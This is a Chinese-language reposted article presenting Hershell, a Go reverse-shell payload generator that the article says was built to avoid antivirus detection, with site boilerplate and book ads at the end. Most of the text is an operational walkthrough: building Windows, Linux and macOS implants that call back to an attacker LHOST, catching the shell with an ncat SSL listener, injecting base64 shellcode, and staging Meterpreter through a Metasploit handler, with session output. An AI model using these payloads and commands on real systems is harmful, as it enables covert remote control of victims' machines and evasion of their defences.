内容简介:Hershell是一款功能强大的跨平台反向Shell生成器,该工具使用Go语言开发,基于TCP反向Shell实现其功能。该工具使用了TLS来保障数据通讯的安全性,并且提供了证书公共密钥指纹绑定功能来防止通信数据被拦截。
Hershell是一款功能强大的跨平台反向 Shell 生成器,该 工具 使用 Go 语言开发,基于TCP反向Shell实现其功能。
该工具使用了TLS来保障数据通讯的安全性,并且提供了证书公共密钥指纹绑定功能来防止通信数据被拦截。
支持的系统
Hershell的当前版本支持以下操作系统:
Windows Linux macOS FreeBSD
开发目的
虽然Meterpreter Payload有时也能用,但是这种方法很容易被反病毒产品检测到。因此,Hershell便应运而生,它可以给我们提供一个基于TCP的反向Shell,而且能够支持各种不同的操作系统平台。
工具使用&依赖组件
Hershell使用Go语言开发,我们首先需要按照Go官方手册【 点我获取 】在我们的设备上完成Go环境的搭建,并设置好$GOPATH环境变量。
接下来,运行下列命令来获取项目源码:
go get github.com/lesnuages/hershell
构建Payload
在构建Payload时,我们可以选择使用已提供的Makefile来完成构建。此时,我们需要设置以下环境变量:
GOOS : 目标操作系统 GOARCH : 目标架构 LHOST : 攻击者IP或主机域名 LPORT : 监听器端口
关于GOOS和GOARCH变量的设置,可以参考这篇【 文档 】。
当然了,我们也在Makefile中提供了一些可供参考的变量值:
depends : 生成服务器证书(反向Shell需要使用到) windows32 : 构建一个32位Windows可执行程序(PE 32位) windows64 : 构建一个64位Windows可执行程序(PE 64位) linux32 : 构建一个32位 Linux 可执行程序(ELF 32位) linux64 : 构建一个64位Linux可执行程序(ELF 64位) macos32 : 构建一个32位macOS可执行程序(Mach-O) macos64 : 构建一个64位macOS可执行程序(Mach-O)
针对上述列表中的目标平台,我们还需要设置LHOST和LPORT这两个环境变量。
使用反向Shell
代码开始执行之后,工具将给我们提供一个远程Shell,它是一个自定义的交互式Shell,允许我们通过Windows上的cmd.exe或Unix设备中的/bin/sh来执行系统命令。
Hershell支持的部分特定命令如下表所示:
run_shell : 获取系统Shell
inject <base64 shellcode> : 向相同进程内存中注入一个shellcode(Base64编码),并执行代码。
meterpreter [tcp|http|https] IP:PORT :与多个处理器建立连接并从Metasploit获取第二阶段的反向TCP、HTTP或HTTPS Meterpreter,然后在内存中执行Shellcode(该功能目前仅支持Windows平台)。
exit : 退出程序
工具使用
首先,我们需要使用下面的命令生成一个有效的证书:
$ make depends openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem Generating a 4096 bit RSA private key ....................................................................................++ .....++ writing new private key to 'server.key' ----- cat server.key >> server.pem
针对Windows平台:
# Predifined 32 bit target $ make windows32 LHOST=192.168.0.12 LPORT=1234 # Predifined 64 bit target $ make windows64 LHOST=192.168.0.12 LPORT=1234
针对Linux平台:
# Predifined 32 bit target $ make linux32 LHOST=192.168.0.12 LPORT=1234 # Predifined 64 bit target $ make linux64 LHOST=192.168.0.12 LPORT=1234
针对macOS平台:
$ make macos LHOST=192.168.0.12 LPORT=1234
工具使用样例
基础使用
我们可以使用各种工具来处理传入的连接,比如说:
socat ncat openssl服务器模块 Metasploit的各种handler (python/shell_reverse_tcp_ssl payload)
下面是ncat的使用样例:
$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 172.16.122.105. Ncat: Connection from 172.16.122.105:47814. [hershell]> whoami desktop-3pvv31a\lab
Meterpreter场景
注意:目前该功能仅支持在Windows平台上使用。
该工具的Meterpreter使用场景目前仅支持下列Payload:
windows/meterpreter/reverse_tcp windows/x64/meterpreter/reverse_tcp windows/meterpreter/reverse_http windows/x64/meterpreter/reverse_http windows/meterpreter/reverse_https windows/x64/meterpreter/reverse_https
当你选择使用某个Payload之后,别忘了选择正确的传输端口(tcp、http或https)。
MeterpreterHandler使用样例如下:
[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler [14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https payload => windows/x64/meterpreter/reverse_https [14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105 lhost => 172.16.122.105 [14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443 lport => 8443 [14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem HandlerSSLCert => ./server.pem [14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j [*] Exploit running as background job 0. [*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443 [14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
接下来,在hershell中,使用meterpreter命令:
[hershell]> meterpreter https 172.16.122.105:8443
此时,我们将能够在msfconsole中获取到新的Meterpreter会话:
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) > [*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ... [*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100 [14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A 172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15) [14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: DESKTOP-3PVV31A\lab
项目地址
Hershell:【 GitHub传送门 】
* 参考来源: lesnuages ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:
- 开源海报生成器 2.0,功能更强大,速度更快。
- 开源海报生成器 2.0,功能更强大,速度更快。
- 光之翼 Java 通用代码生成器 1.0.0 尝鲜版公布,便携易用,功能强大
- Java 通用代码生成器光 2.1.0 信念 Beta2 版公布,三大变形功能群齐备,功能强大且灵活
- 光之翼 Java 通用代码生成器 1.0.0 Beta 版已公布,经过更新与测试,便携易用,功能强大
- 一款功能强大的 PHP 开发框架
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Android编程权威指南(第2版)
Bill Phillips、Chris Stewart、Brian Hardy、Kristin Marsicano / 王明发 / 人民邮电出版社 / 2016-5 / 109.00 元
Big Nerd Ranch是美国一家专业的移动开发技术培训机构。本书主要以其Android训练营教学课程为基础,融合了几位作者多年的心得体会,是一本完全面向实战的Android编程权威指南。全书共34章,详细介绍了8个Android 应用。通过这些精心设计的应用,读者可掌握很多重要的理论知识和开发技巧,获得最前沿的开发经验。 如果你熟悉Java语言,或者了解面向对象编程,那就立刻开始And......一起来看看 《Android编程权威指南(第2版)》 这本书的介绍吧!
JS 压缩/解压工具
在线压缩/解压 JS 代码
图片转BASE64编码
在线图片转Base64编码工具